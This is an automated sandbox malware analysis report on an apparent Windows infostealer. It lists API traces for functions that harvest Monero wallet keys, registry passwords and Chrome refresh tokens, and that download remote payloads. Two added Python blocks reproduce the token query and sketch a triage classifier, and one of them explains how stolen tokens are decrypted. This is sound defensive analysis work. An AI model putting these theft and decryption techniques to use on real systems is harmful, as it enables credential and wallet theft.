                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 1e6c1cf48dc7687e8cb904e7c885ce13ac450e13cd5b3743eba8b79cdce161fc
                          • Instruction ID: fba09afe344b5ddf70aa1b0761066ff3011ca1f8f5eb364d3199a8f631889d16
                          • Opcode Fuzzy Hash: 1e6c1cf48dc7687e8cb904e7c885ce13ac450e13cd5b3743eba8b79cdce161fc
                          • Instruction Fuzzy Hash: F451F2F195021D57CB15FB60DE91EFD737CAB64300F4045A8B70EA2091EE706B89CBA6
                          APIs
                            • Part of subcall function 00AE72D0: memset.MSVCRT ref: 00AE7314
                            • Part of subcall function 00AE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AE733A
                            • Part of subcall function 00AE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AE73B1
                            • Part of subcall function 00AE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
                            • Part of subcall function 00AE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00AE7452
                            • Part of subcall function 00AE72D0: HeapFree.KERNEL32(00000000), ref: 00AE7459
                          • lstrcat.KERNEL32(00000000,00B017FC), ref: 00AE7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00AE765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE768F
                          • lstrcat.KERNEL32(00000000,00B01804), ref: 00AE76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AE76D3
                          • lstrcat.KERNEL32(00000000,00B01808), ref: 00AE76ED
                          • task.LIBCPMTD ref: 00AE76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 8ac3704bd71651f217dbfbfea3d0c09a7a2d98c33ff54ced31b48e59b9ef316b
                          • Instruction ID: dee9884393dc8f5eb78363cbe4c7d1c8b891cd45cd9c7457027071f6e7d91012
                          • Opcode Fuzzy Hash: 8ac3704bd71651f217dbfbfea3d0c09a7a2d98c33ff54ced31b48e59b9ef316b
                          • Instruction Fuzzy Hash: 63317A75900209DBCB18EBA9DD85DFEB7B8FB64302B104508F102A72A0DB38A947DB61
                          APIs
                          • memset.MSVCRT ref: 00AE7314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AE733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AE73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AE7452
                          • HeapFree.KERNEL32(00000000), ref: 00AE7459
                          • task.LIBCPMTD ref: 00AE7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 192c7eadf2ea60e1aa43bf5446f1ba976b2ddd0ebd5c841b83e3f2271bf25949
                          • Instruction ID: 2f4249ed8abfd8af18ec9db2b50bea6cbbc9431c958818a7e3894870fb399927
                          • Opcode Fuzzy Hash: 192c7eadf2ea60e1aa43bf5446f1ba976b2ddd0ebd5c841b83e3f2271bf25949
                          • Instruction Fuzzy Hash: 54613BB58042A89BDB24DB50DD41BDEB7B8FF44300F0081E9E649A6181EB705FC9CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0179DA80,00000000,?,00B00E2C,00000000,?,00000000), ref: 00AF8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AF8158
                          • __aulldiv.LIBCMT ref: 00AF8172
                          • __aulldiv.LIBCMT ref: 00AF8180
                          • wsprintfA.USER32 ref: 00AF81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 889ec848685592ef1a461000d120bcfa4fba9a914e6f9dfa701ffe9b586c7fd3
                          • Instruction ID: f37eca11c42be2ba8d219cf555fb9ce195f8a3b9297d58bb3e3a51f8fa7b4fda
                          • Opcode Fuzzy Hash: 889ec848685592ef1a461000d120bcfa4fba9a914e6f9dfa701ffe9b586c7fd3
                          • Instruction Fuzzy Hash: 3421F7B1A44218ABDB10DFD8CD49FAEB7B9FB44B10F104609F705AB280D77869018BA9
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                          • InternetOpenA.WININET(00B00DF7,00000001,00000000,00000000,00000000), ref: 00AE610F
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AE618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AE61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00AE61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AE620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00AE6249
                          • InternetCloseHandle.WININET(?), ref: 00AE6253
                          • InternetCloseHandle.WININET(00000000), ref: 00AE6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 48b9aed343f34aaa6497481b24e41af994f645af8f422db1d4cfe8f7f7ad7c80
                          • Instruction ID: b14e5ccc4069b691bb235d113aee6fa46d9e313622aee65c11343a51b6f0c291
                          • Opcode Fuzzy Hash: 48b9aed343f34aaa6497481b24e41af994f645af8f422db1d4cfe8f7f7ad7c80
                          • Instruction Fuzzy Hash: 7D5182B1A00208ABDB20DF95DD45BEE77B8EB14741F108598B709A72C0DB746A86CFA5
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00AEBC9F
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00AEBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00AEBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00AEBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 59b8c5467ab40fd1c95478ec0e43a682d0eb43b2c8a5abbccadd8235c77c64b2
                          • Instruction ID: 439f2b7c9123838a267cf1c72b3082e283d30600ee00d9994679e93cab0c1368
                          • Opcode Fuzzy Hash: 59b8c5467ab40fd1c95478ec0e43a682d0eb43b2c8a5abbccadd8235c77c64b2
                          • Instruction Fuzzy Hash: 81B158B191010C9BDB14FBE4CE96DFE7378AF64340F404568F60AA6191EF746A49CBB2
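The String ID of this entry carries a literal SQLite statement, SELECT service, encrypted_token FROM token_service, and the function then searches the result buffer for "AccountId" with StrStrA (its helpers also build the \Monero\wallet.keys path seen in the subcall lines). The block below is an added example, not code from the Joe Sandbox report or from the sample: it runs that exact query against a constructed in-memory copy of the one Chromium table it names, so a responder can see what a returned row looks like and that the blob still has to be unwrapped. The table schema follows Chromium's token_service table; the account ids and blobs are made up, and the helper names (build_constructed_web_data, exposure_report, token_protection) are mine.

```python
"""Constructed reproduction of the token_service query seen in the entry above.

Added example; not part of the report or the sample. Rows, ids and blobs are fake.
"""
import sqlite3
from typing import List, Tuple

# Query string exactly as it appears in the entry's String ID.
STEALER_QUERY = "SELECT service, encrypted_token FROM token_service"

# DPAPI blob header: dwVersion = 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian field order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def build_constructed_web_data() -> sqlite3.Connection:
    """In-memory stand-in for Chrome's 'Web Data' database.

    Only token_service is created, with the two columns the query names.
    'AccountId-<id>' is the key form Chromium uses for refresh tokens; the
    ids and the token blobs below are constructed.
    """
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE token_service ("
        "service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)"
    )
    con.executemany(
        "INSERT INTO token_service VALUES (?, ?)",
        [
            # OSCrypt 'v10' ciphertext: AES-GCM under the key kept in Local State
            ("AccountId-110000000000000000000", b"v10" + bytes(range(12)) + b"\x00" * 32),
            # Bare DPAPI blob, as older Chrome builds wrote it
            ("AccountId-220000000000000000000", DPAPI_HEADER + b"\x00" * 16),
            # A row that the sample's StrStrA("AccountId") filter would skip
            ("zzz-not-an-account", b"v10" + b"\x00" * 44),
        ],
    )
    con.commit()
    return con


def run_stealer_query(con: sqlite3.Connection) -> List[Tuple[str, bytes]]:
    """What the sample gets back: one (service, encrypted_token) row per stored token."""
    return con.execute(STEALER_QUERY).fetchall()


def token_protection(blob: bytes) -> str:
    """How the blob is protected, i.e. what the stealer still has to do with it."""
    if blob.startswith(b"v10"):
        return "oscrypt-v10 (AES-GCM, key in Local State)"
    if blob.startswith(DPAPI_HEADER):
        return "dpapi (CryptUnprotectData as the user)"
    return "unknown"


def exposure_report(con: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Rows the query exposes, filtered the way the function does: a substring
    search for 'AccountId' on the service column. Sorted for stable output."""
    return sorted(
        (service, token_protection(tok))
        for service, tok in run_stealer_query(con)
        if "AccountId" in service
    )


if __name__ == "__main__":
    for service, how in exposure_report(build_constructed_web_data()):
        print(service, "->", how)
```

For triage, the point is the second column: a 'v10' blob is useless to the operator without the os_crypt.encrypted_key from the same profile's Local State, which is why stealers that run this query also read Local State and call CryptUnprotectData.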
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 2ba82ed485d9f0d13b4fe4017ed67b69ee4772d7115244f7bef21e616b20d1af
                          • Instruction ID: 1b61a71b0a2387a06583d3295f04e6fc048d52e32acc65b95dc1d63665560193
                          • Opcode Fuzzy Hash: 2ba82ed485d9f0d13b4fe4017ed67b69ee4772d7115244f7bef21e616b20d1af
                          • Instruction Fuzzy Hash: E4F03A30904309EFD354AFE8A90972CBB70FB24702F040199E609C7390D6704A429BEA
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AE4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE4FD1
                          • InternetOpenA.WININET(00B00DDF,00000000,00000000,00000000,00000000), ref: 00AE4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AE5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AE5041
                          • InternetCloseHandle.WININET(?), ref: 00AE50B9
                          • InternetCloseHandle.WININET(?), ref: 00AE50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: cc8d82bf7221871c23da6d32ade5498071e38a2fae538c998007a9a3f49eb580
                          • Instruction ID: 7e8d12da4c18a796ca1bc4e0b1009c41d7b9f2bc619a300d9419bd5a849790f7
                          • Opcode Fuzzy Hash: cc8d82bf7221871c23da6d32ade5498071e38a2fae538c998007a9a3f49eb580
                          • Instruction Fuzzy Hash: E63107B4A00218ABDB20DF54DD85BDCB7B4EB48704F1081E9FB09A7281C7706EC58FA9
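Four of the entries above describe a capability purely through their API sequence: the HKCU value scan for "Password" (ref 00AE733A), the GlobalMemoryStatusEx profiling that ends in a "%d MB" string (ref 00AF8130), the URL-to-file downloader (ref 00AE610F) and the URL-to-heap fetch into a 0x05F5E0FF-byte buffer (ref 00AE4FCA). The block below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly this report's "APIs" format and tags each function when a required set of APIs (and, where it matters, a literal argument such as Password) is present and a disqualifying API is absent. The rule set, tag names and hive table are mine; the excerpt lines are copied from the entries above, with callee ("Part of subcall function") lines kept but not counted toward a tag.

```python
"""Capability triage over this report's per-function 'APIs' listings.

Added example; not part of the Joe Sandbox report or the sample. Rules, tags
and the hive table are mine; the excerpt lines are copied from the entries above.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple


class ApiCall(NamedTuple):
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall: Optional[str]  # callee address on 'Part of subcall function' lines


# Matches the three line shapes used in the report:
#   • memset.MSVCRT ref: 00AE7314
#   • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
#   • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Predefined hive handles as they appear in the first RegOpenKeyExA argument.
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

# (tag, APIs that must all be called, APIs that must be absent, literal args required)
RULES = [
    ("registry-value-scan:Password",
     {"RegOpenKeyExA", "RegEnumValueA", "StrStrA"}, set(), {"Password"}),
    ("wininet-download-to-file",
     {"InternetOpenUrlA", "InternetReadFile", "CreateFileA", "WriteFile"}, set(), set()),
    ("wininet-fetch-to-memory",
     {"InternetOpenUrlA", "InternetReadFile", "RtlAllocateHeap"}, {"WriteFile"}, set()),
    ("host-profile:physical-memory",
     {"GlobalMemoryStatusEx", "wsprintfA"}, set(), set()),
    ("host-profile:build-number",
     {"RegOpenKeyExA", "RegQueryValueExA"}, set(), {"CurrentBuildNumber"}),
]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn one entry's 'APIs' lines into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("name"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def classify(calls: List[ApiCall]) -> List[str]:
    """Tags whose rule the function's own calls satisfy (callee lines are ignored)."""
    own = [c for c in calls if c.subcall is None]
    names = {c.name for c in own}
    literals = {a for c in own for a in c.args}
    return [tag for tag, need, deny, lits in RULES
            if need <= names and not (deny & names) and lits <= literals]


def registry_hives(calls: List[ApiCall]) -> List[str]:
    """Hives opened by RegOpenKeyEx* calls, decoded from the handle constant."""
    return sorted({HIVES[c.args[0]] for c in calls
                   if c.name.startswith("RegOpenKeyEx") and c.args and c.args[0] in HIVES})


# Excerpts copied from the entries above (function ref -> its 'APIs' lines).
SAMPLES: Dict[str, str] = {
    "00AE733A": """\
• memset.MSVCRT ref: 00AE7314
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AE733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AE73B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AE740D
• GetProcessHeap.KERNEL32(00000000,?), ref: 00AE7452
• HeapFree.KERNEL32(00000000), ref: 00AE7459
""",
    "00AF8130": """\
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0179DA80,00000000,?,00B00E2C,00000000,?,00000000), ref: 00AF8130
• RtlAllocateHeap.NTDLL(00000000), ref: 00AF8137
• GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AF8158
• __aulldiv.LIBCMT ref: 00AF8172
• wsprintfA.USER32 ref: 00AF81AC
""",
    "00AE610F": """\
  • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
• InternetOpenA.WININET(00B00DF7,00000001,00000000,00000000,00000000), ref: 00AE610F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AE618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AE61B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 00AE61DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AE620A
""",
    "00AE4FCA": """\
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AE4FCA
• RtlAllocateHeap.NTDLL(00000000), ref: 00AE4FD1
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AE5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AE5041
""",
}


def triage(samples: Dict[str, str]) -> Dict[str, List[str]]:
    """Tag every excerpt; an untagged function is a gap in the rules, not a clean bill."""
    return {ref: classify(parse_api_lines(text)) for ref, text in samples.items()}


if __name__ == "__main__":
    for ref, tags in triage(SAMPLES).items():
        print(ref, tags, registry_hives(parse_api_lines(SAMPLES[ref])))
```

The deny set matters: the two WinINet functions share InternetOpenUrlA and InternetReadFile, and only the presence of CreateFileA/WriteFile versus RtlAllocateHeap tells a dropper stage from a C2 fetch into memory. The same rule table can be grown with the "Windows 11"/CurrentBuildNumber and "%s\%s" registry entries further down the page.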
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AF8426
                          • wsprintfA.USER32 ref: 00AF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8499
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0179D9F0,00000000,000F003F,?,00000400), ref: 00AF84EC
                          • lstrlen.KERNEL32(?), ref: 00AF8501
                          • RegQueryValueExA.ADVAPI32(00000000,0179DA20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B00B34), ref: 00AF8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: b35ac0601448dbfd49892a9fdb61e13ecf4016ae850a9b35d58e466a3969d242
                          • Instruction ID: 7a86480a04b3df9ae176fb4ab25765fea8c14108f0943b3a6e110273e1db6e91
                          • Opcode Fuzzy Hash: b35ac0601448dbfd49892a9fdb61e13ecf4016ae850a9b35d58e466a3969d242
                          • Instruction Fuzzy Hash: 2521E7B191021CABDB64DB54DC85FE9B7B8FB48700F00C5D9B609A6280DF756A86CFE4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0178B870,00000000,00020119,00000000), ref: 00AF76DD
                          • RegQueryValueExA.ADVAPI32(00000000,0179DA08,00000000,00000000,?,000000FF), ref: 00AF76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: bb34234c515c351bead8b493400d9bc6a665e502a15194588c4ba7a62d550919
                          • Instruction ID: 689514dc5d43bdd70c89c08064a602eadc3f53bcbf166dc76b8f55795d8e3cfa
                          • Opcode Fuzzy Hash: bb34234c515c351bead8b493400d9bc6a665e502a15194588c4ba7a62d550919
                          • Instruction Fuzzy Hash: 010162B5A04309BBE710EBE8DD49F7DB7B8EB58701F104455FB04D7390E67099018B61
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0178B870,00000000,00020119,00AF76B9), ref: 00AF775B
                          • RegQueryValueExA.ADVAPI32(00AF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00AF777A
                          • RegCloseKey.ADVAPI32(00AF76B9), ref: 00AF7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 7064f06c3b62842fc70031ede88245822f53589f7f1c205aec9e2a33da7d5af5
                          • Instruction ID: c88cccfbcc8d84433a067cd986887f0bf16ec7fa5b34ed64e40455a52e66ca47
                          • Opcode Fuzzy Hash: 7064f06c3b62842fc70031ede88245822f53589f7f1c205aec9e2a33da7d5af5
                          • Instruction Fuzzy Hash: 550144B5A40308BBDB10DBE4DC49FAEB7B8EB54700F104555FA05E7281D67059018B61
                          APIs
                          • memset.MSVCRT ref: 00AF40D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0179D6E0,00000000,00020119,?), ref: 00AF40F4
                          • RegQueryValueExA.ADVAPI32(?,0179DB10,00000000,00000000,00000000,000000FF), ref: 00AF4118
                          • RegCloseKey.ADVAPI32(?), ref: 00AF4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4147
                          • lstrcat.KERNEL32(?,0179DD68), ref: 00AF415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
